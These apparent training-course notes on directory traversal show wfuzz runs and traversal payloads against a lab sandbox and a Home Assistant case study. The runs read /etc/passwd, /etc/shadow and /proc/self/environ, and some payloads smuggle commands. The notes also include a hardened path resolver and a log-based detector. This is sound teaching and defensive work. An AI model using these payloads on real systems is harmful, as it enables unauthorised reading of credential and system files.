Module 10: Directory Traversal Attacks

Directory Traversal Overview

Accessing The Lab Machines

Start the VPN, the VM, and add the ip to your hosts file.

Understanding Suggestive Parameters

A parameter that hints at what it does or the type of data it works with, typically via its name.

Sample search request

GET /search/Hello%20World! HTTP/1.1

Sample file retrieval request

GET /admin/dashboard/manage/handler.aspx?file=ourFile.jpeg HTTP/1.1

Sample Suggestive Parameters

?file=
?f=
/file/someFile

?location=
?l=
/location/someLocation

search=
s=
/search/someSearch

?data=
?d=
/data/someData

?download=
?d=
/download/someFileData

Relative vs. Absolute Pathing

Absolute Pathing

The full path from the filesystem root, e.g. /home/kali/Desktop

Example command utilizing absolute pathing

kali@kali:~$ cd /etc/
                                                  
kali@kali:/etc$ pwd
/etc
                                           
kali@kali:/etc$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:kali,root
fax:x:21:
voice:x:22:
cdrom:x:24:kali
floppy:x:25:kali
tape:x:26:
sudo:x:27:kali
audio:x:29:pulse,kali
dip:x:30:kali
www-data:x:33:
backup:x:34:
... 

Extra Mile I

Try it in your own VM.

Relative Pathing

The path to a target file/folder relative to your current working directory.

Group File Read from a relative perspective in /etc/

kali@kali:/etc$ pwd
/etc
                                    
kali@kali:/etc$ cat group     
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:kali,root
fax:x:21:
voice:x:22:
cdrom:x:24:kali
floppy:x:25:kali
tape:x:26:
sudo:x:27:kali
audio:x:29:pulse,kali
dip:x:30:kali
www-data:x:33:
backup:x:34:

Group File Read with traversal strings

kali@kali:~$ pwd
/home/kali

kali@kali:~$ cat ../../etc/group
root:x:0:
daemon:x:1:
...
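
The two pathing modes above are exactly what a file-serving handler has to cope with. As an added example written for these notes (not code from the course or the sandbox), the Python below resolves a user-supplied path parameter two ways: vulnerable_resolve() joins it straight onto the web root, and safe_resolve() canonicalises and enforces containment. WEB_ROOT and the function names are assumptions; the payloads are the ones that appear in the wfuzz output later in this module. It shows why both the relative ../ strings and a bare absolute value such as /etc/passwd land on the real filesystem root, and what check stops them.

```python
import posixpath
import urllib.parse
from typing import Optional

# Constructed base directory for the example; it mirrors the /var/www/html
# layout the notes infer from the path parameter. Paths are only resolved,
# never opened, so this runs on any machine.
WEB_ROOT = "/var/www/html/demo"


def vulnerable_resolve(user_path: str) -> str:
    """Naive handler: decode the parameter, join it onto the web root, normalise.

    Two defects, both exercised by the sandbox payloads in the notes:
      * '../' segments are honoured, so a relative payload walks out of WEB_ROOT;
      * posixpath.join drops WEB_ROOT entirely when the parameter is absolute,
        so '/etc/passwd' is served as-is.
    """
    decoded = urllib.parse.unquote(user_path)
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded))


def safe_resolve(user_path: str) -> Optional[str]:
    """Hardened handler: canonicalise, then refuse anything outside WEB_ROOT.

    Returns the resolved path, or None when the request must be rejected.
    """
    decoded = urllib.parse.unquote(user_path)
    # A NUL byte can truncate the path in C-based back ends ("%00" payloads).
    if "\x00" in decoded:
        return None
    # Drop leading slashes so an absolute value cannot replace the base.
    relative = decoded.lstrip("/")
    # normpath collapses '.', '..' and repeated separators lexically.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, relative))
    # Containment check on whole path segments (not a string prefix test, so
    # '/var/www/html/demonstration' would also be rejected).
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


# One legitimate value followed by payloads taken from the wfuzz output.
SAMPLE_PARAMS = [
    "css",
    "../../../../etc/group",
    "/etc/passwd",
    "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd",
    "/./././././././././././etc/passwd",
    "%00/etc/passwd%00",
]

if __name__ == "__main__":
    for p in SAMPLE_PARAMS:
        print(f"{p!r:45} naive -> {vulnerable_resolve(p)!r:36} safe -> {safe_resolve(p)!r}")
```

Running it prints each payload beside both resolutions; every traversal string resolves to /etc/... in the naive handler and to None (or a harmless path under the web root) in the hardened one. The check here is purely lexical: a real handler should also resolve symlinks with os.path.realpath() and apply the same commonpath test to the result.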

Extra Mile II

Do it on your own VM.

Directory Listing

Parameter Analysis

Path Variable

The value /var/www/html/demo/css indicates we're likely dealing with absolute pathing. It also suggests the target is running Linux with a web root of /var/www/html.

Evidence of Directory Listing

Test by replacing the path with ..%2F

First traversal string usage
Var Directory
Attempting to access /etc/passwd
Disclosure of a system-level user

Directory Traversal Sandbox

Directory Traversal - Exploitation

Directory Traversal Sandbox Landing Page
Directory Traversal Sandbox Absolute Pathing
Directory Traversal Sandbox - Relative Pathing

Wordlist/Payload Lists

Automated attempts are only as good as the wordlist used — we'll be using seclists/Fuzzing/LFI/LFI-Jhaddix.txt.

Fuzzing the Path Parameter

Erroneous Output to be Filtered

kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://dirTravSandbox:80/relativePathing.php?path=../../../../../../../../../../FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://dirTravSandbox:80/relativePathing.php?path=../../../../../../../../../../FUZZ
Total requests: 914

=====================================================================
ID           Response   Lines    Word       Chars       Payload                   
=====================================================================
000000007:   200        3 L      10 W       81 Ch       "%0a/bin/cat%20/etc/passwd"
000000004:   200        3 L      10 W       81 Ch       "%00/etc/passwd%00"
000000014:   200        3 L      10 W       81 Ch       "/../../../../../../../../%2A"
000000005:   200        3 L      10 W       81 Ch       "%00../../../../../../etc/shadow"
000000002:   200        3 L      10 W       81 Ch       "\...\\\...\\\...\\\"
000000026:   200        3 L      19 W       125 Ch     "/admin/install.php"
000000020:   200        3 L      10 W       81 Ch       "..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed"
000000022:   200        3 L      10 W       81 Ch       "..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow"
000000023:   200        3 L      10 W       81 Ch       "=3D ./... . .%2f.."
000000029:   200        3 L      10 W       81 Ch       "/apache2/logs/access.log"
000000021:   200        22 L     34 W       1007 Ch     "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
000000027:   200        3 L      10 W       81 Ch       "../../../administrator/inbox"
000000033:   200        3 L      10 W       81 Ch       "/apache/logs/access.log"
000000035:   200        3 L      10 W       81 Ch       "../../../../apache/logs/access.log"
000000036:   200        3 L      10 W       81 Ch       "../../../apache/logs/access.log"
000000037:   200        3 L      10 W       81 Ch       "../../apache/logs/access.log"
000000038:   200        3 L      10 W       81 Ch       "../apache/logs/access.log"
000000034:   200        3 L      10 W       81 Ch       "../../../../../apache/logs/access.log"
000000031:   200        3 L      10 W       81 Ch       "/apache2/logs/error.log"
000000028:   200        3 L      10 W       81 Ch       "/apache2/logs/access_log"
000000030:   200        3 L      10 W       81 Ch       "/apache2/logs/error_log"
000000032:   200        3 L      10 W       81 Ch       "/apache/logs/access_log"
000000039:   200        3 L      10 W       81 Ch       "/apache/logs/error_log"
000000041:   200        3 L      10 W       81 Ch       "../../../../../apache/logs/error.log"
000000045:   200        3 L      10 W       81 Ch       "../apache/logs/error.log"
000000052:   200        3 L      10 W       81 Ch       "/../../../../../../../../bin/id|"
000000051:   200        3 L      10 W       81 Ch       "/.bashrc"
000000050:   200        3 L      10 W       81 Ch       "/.bash_profile"
000000049:   200        3 L      10 W       81 Ch       "/.bash_history"   
...

Enumerating the target operating system

kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hc 404 --hh 81,125 http://dirTravSandbox/relativePathing.php?path=../../../../../../../../../../../../FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://dirTravSandbox/relativePathing.php?path=../../../../../../../../../../../../FUZZ
Total requests: 914

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000021:   200        22 L     34 W       1007 Ch     "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
000000114:   200        230 L    1125 W     7305 Ch     "/etc/apache2/apache2.conf"
000000131:   200        42 L     49 W       527 Ch      "/etc/group"
000000128:   200        4 L      16 W       118 Ch      "/etc/fstab"
000000122:   200        9 L      37 W       502 Ch      "/etc/apt/sources.list"
000000198:   200        10 L     26 W       255 Ch      "/etc/hosts"
000000199:   200        10 L     26 W       255 Ch      "../../../../../../../../../../../../etc/hosts"
000000230:   200        5 L      15 W       108 Ch      "/etc/issue"
000000229:   200        358 L    1060 W     8262 Ch     "/etc/init.d/apache2"
000000239:   200        10 L     51 W       367 Ch      "/etc/motd"
...
000000243:   200        23 L     71 W       575 Ch      "/etc/nsswitch.conf"
000000269:   200        22 L     34 W       1007 Ch     "../../../../etc/passwd"
000000267:   200        22 L     34 W       1007 Ch     "../../../../../../etc/passwd"
000000272:   200        22 L     34 W       1007 Ch     "../etc/passwd"
000000276:   200        22 L     34 W       1007 Ch     "etc/passwd"
000000271:   200        22 L     34 W       1007 Ch     "../../etc/passwd"
000000270:   200        22 L     34 W       1007 Ch     "../../../etc/passwd"
000000268:   200        22 L     34 W       1007 Ch     "../../../../../etc/passwd"
000000304:   200        22 L     34 W       1007 Ch     "../../../../../../etc/passwd&=%3C%3C%3C%3C"
000000392:   200        5 L      14 W       119 Ch      "/etc/resolv.conf"
000000495:   200        5 L      25 W       237 Ch      "/proc/net/arp"
000000494:   200        29 L     166 W      3272 Ch     "/proc/mounts"
000000496:   200        9 L      98 W       774 Ch      "/proc/net/dev"
000000492:   200        4 L      15 W       105 Ch      "/proc/loadavg"
000000493:   200        53 L     156 W      1472 Ch     "/proc/meminfo"
000000490:   200        159 L    1018 W     5667 Ch     "/proc/cpuinfo"
000000491:   200        34 L     298 W      3097 Ch     "/proc/interrupts"
000000497:   200        6 L      43 W       465 Ch      "/proc/net/route"
000000499:   200        23 L     86 W       654 Ch      "/proc/partitions"
000000503:   200        4 L      31 W       225 Ch      "/proc/version"
000000502:   200        59 L     145 W      1116 Ch     "/proc/self/status"
000000500:   200        3 L      10 W       102 Ch      "/proc/self/cmdline"
000000498:   200        16 L     227 W      2031 Ch     "/proc/net/tcp"
000000692:   200        3 L      10 W       29573 Ch    "/var/log/lastlog"
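
The wfuzz runs above give the attacker's view: hundreds of requests against one parameter, with the 81-character error page filtered out by size. The same traffic is just as distinctive in the web server's own logs. The detector below is an added example written for these notes, not a tool used in the course; the log lines are constructed in Apache combined format from payloads that appear on this page (IPs, timestamps and user agents are made up). It normalises the URI path and every query value the way the server would (percent-decoding, backslash folding) and flags three conditions: a path that climbs above its base directory, an absolute path into /etc, /proc or /var/log, and an embedded NUL byte. The decoding loop is bounded rather than single-pass, a small generalisation over the single-encoded payloads shown above.

```python
import posixpath
import re
import urllib.parse
from collections import Counter
from typing import Dict, List

# Apache combined log format: client, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Locations a file-serving parameter has no business pointing at; drawn from
# the targets the LFI wordlist in the notes probes (/etc, /proc, /var/log).
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/var/log/")

# Constructed log lines (not captured from the lab). Requests 1-4 and 7 mirror
# payloads from this module; 5 and 6 are legitimate uses of an absolute path
# and of '..' that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /relativePathing.php?path=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1007 "-" "Wfuzz/3.1.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /relativePathing.php?path=..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 1007 "-" "Wfuzz/3.1.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /relativePathing.php?path=%00/etc/passwd%00 HTTP/1.1" 200 81 "-" "Wfuzz/3.1.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /fontawesome/../../../../../../../../../../../../etc/shadow HTTP/1.1" 200 454 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /relativePathing.php?path=/var/www/html/demo/css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /demo/css/../img/logo.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /relativePathing.php?path=/proc/self/cmdline HTTP/1.1" 200 102 "-" "Wfuzz/3.1.0"
"""


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), then fold
    backslashes to forward slashes so '..\\' variants normalise like '../'."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def min_depth(path: str) -> int:
    """Lowest directory depth reached while walking the segments; a negative
    result means the path climbs above whatever base directory it is joined to."""
    depth = lowest = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        lowest = min(lowest, depth)
    return lowest


def inspect_value(value: str) -> List[str]:
    """Return the reasons (possibly none) one path-like value looks like traversal."""
    decoded = fully_decode(value)
    reasons = []
    if "\x00" in decoded:
        reasons.append("null byte")
    if min_depth(decoded) < 0:
        reasons.append("escapes base directory")
    if decoded.startswith("/"):
        normalised = posixpath.normpath(decoded)
        if normalised.startswith(SENSITIVE_PREFIXES):
            reasons.append("absolute path into " + normalised.split("/", 2)[1])
    return reasons


def detect(log_text: str) -> List[Dict[str, str]]:
    """Parse each log line and report every path-like value that looks like traversal."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urllib.parse.urlsplit(m["uri"])
        # Inspect the URI path itself (the /fontawesome/ case) and every query
        # value (the ?path= case); parse_qsl already strips one encoding layer.
        candidates = [("uri-path", parts.path)]
        candidates += urllib.parse.parse_qsl(parts.query, keep_blank_values=True)
        for where, value in candidates:
            reasons = inspect_value(value)
            if reasons:
                findings.append({"ip": m["ip"], "where": where, "value": value,
                                 "status": m["status"], "reasons": "; ".join(reasons)})
    return findings


def offenders(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Flagged requests per client; a fuzzing run shows up as one IP with many hits."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']:10} {h['status']} {h['where']:9} {h['reasons']:45} {h['value']!r}")
    print("per-client:", offenders(SAMPLE_LOG and hits))
```

On the sample log this flags five of the seven requests and leaves the two legitimate ones alone, including the benign /demo/css/../img/logo.png whose '..' never leaves the web root. The per-client count is the log-side counterpart of the wordlist run above: one address producing a burst of flagged requests with identical response sizes is a fuzzer, not a user.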

Case Study: Home Assistant

Initial Application Assessment

Login Form for Home Assistant
HTTP History Tab

Fuzzing the Web-Root and Analyzing the 404 Response size

kali@kali:~$ wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt http://homeassistant:8123/FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://homeassistant:8123/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000003:   404        0 L      3 W        14 Ch       ".bashrc"
000000009:   404        0 L      3 W        14 Ch       ".git/HEAD"

Fuzzing the /fontawesome/ URI and analyzing the 404 response size

kali@kali:~$ wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt http://homeassistant:8123/fontawesome/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://homeassistant:8123/fontawesome/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================
000000010:   404        0 L      0 W        0 Ch        ".history"
000000009:   404        0 L      0 W        0 Ch        ".git/HEAD"

Exploitation

Case Study /etc/passwd
Configuration file for Home Assistant
Configuration.yaml

Fuzzing the /fontawesome/ URI

kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hc 404 http://homeassistant:8123/fontawesome/../../../../../../../../../../../../FUZZ         

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://homeassistant:8123/fontawesome/../../../../../../../../../../../../FUZZ
Total requests: 914

=====================================================================
ID           Response   Lines    Word       Chars       Payload                  
=====================================================================
000000128:   200        2 L      12 W       89 Ch       "/etc/fstab"
000000131:   200        49 L     49 W       725 Ch      "/etc/group"
000000198:   200        7 L      16 W       174 Ch      "/etc/hosts"       
000000199:   200        7 L      16 W       174 Ch      "../../../../../../../../../../../../etc/hosts"
000000230:   200        3 L      11 W       54 Ch       "/etc/issue"
000000242:   200        19 L     103 W      767 Ch      "/etc/netconfig"
000000239:   200        10 L     39 W       283 Ch      "/etc/motd"
000000247:   200        28 L     30 W       1228 Ch     "/../../../../../../../../../../etc/passwd"
000000259:   200        28 L     30 W       1228 Ch     "../../../../../../../../../../../../../../etc/passwd"
000000271:   200        28 L     30 W       1228 Ch     "../../etc/passwd"
000000272:   200        28 L     30 W       1228 Ch     "../etc/passwd"
000000270:   200        28 L     30 W       1228 Ch     "../../../etc/passwd"
000000268:   200        28 L     30 W       1228 Ch     "../../../../../etc/passwd"
000000269:   200        28 L     30 W       1228 Ch     "../../../../etc/passwd"
000000267:   200        28 L     30 W       1228 Ch     "../../../../../../etc/passwd"
000000266:   200        28 L     30 W       1228 Ch     "../../../../../../../etc/passwd"
000000265:   200        28 L     30 W       1228 Ch     "../../../../../../../../etc/passwd"
000000246:   200        28 L     30 W       1228 Ch     "/./././././././././././etc/passwd"
000000276:   200        28 L     30 W       1228 Ch     "etc/passwd"
000000401:   200        28 L     28 W       454 Ch      "/./././././././././././etc/shadow"
000000402:   200        28 L     28 W       454 Ch      "/../../../../../../../../../../etc/shadow"
000000392:   200        2 L      4 W        38 Ch       "/etc/resolv.conf"
000000405:   200        28 L     28 W       454 Ch      "/etc/shadow"
000000406:   200        28 L     28 W       454 Ch      "../../../../../../../../../../../../etc/shadow"
000000491:   200        31 L     287 W      3016 Ch     "/proc/interrupts"
000000493:   200        50 L     146 W      1391 Ch     "/proc/meminfo"
000000495:   200        2 L      15 W       156 Ch      "/proc/net/arp"
000000499:   200        20 L     76 W       573 Ch      "/proc/partitions"
000000490:   200        156 L    1008 W     5586 Ch     "/proc/cpuinfo"
000000492:   200        1 L      5 W        25 Ch       "/proc/loadavg"
000000503:   200        1 L      21 W       144 Ch      "/proc/version"
000000497:   200        3 L      33 W       384 Ch      "/proc/net/route"
000000501:   200        0 L      1 W        557 Ch      "/proc/self/environ"
000000498:   200        15 L     240 W      2250 Ch     "/proc/net/tcp"
000000502:   200        56 L     145 W      1063 Ch     "/proc/self/status"
000000500:   200        0 L      1 W        42 Ch       "/proc/self/cmdline"
000000494:   200        37 L     222 W      3760 Ch     "/proc/mounts"
000000496:   200        6 L      88 W       693 Ch      "/proc/net/dev"

Extra Mile

Do the lab yourself.

Wrapping Up

We did the thing.
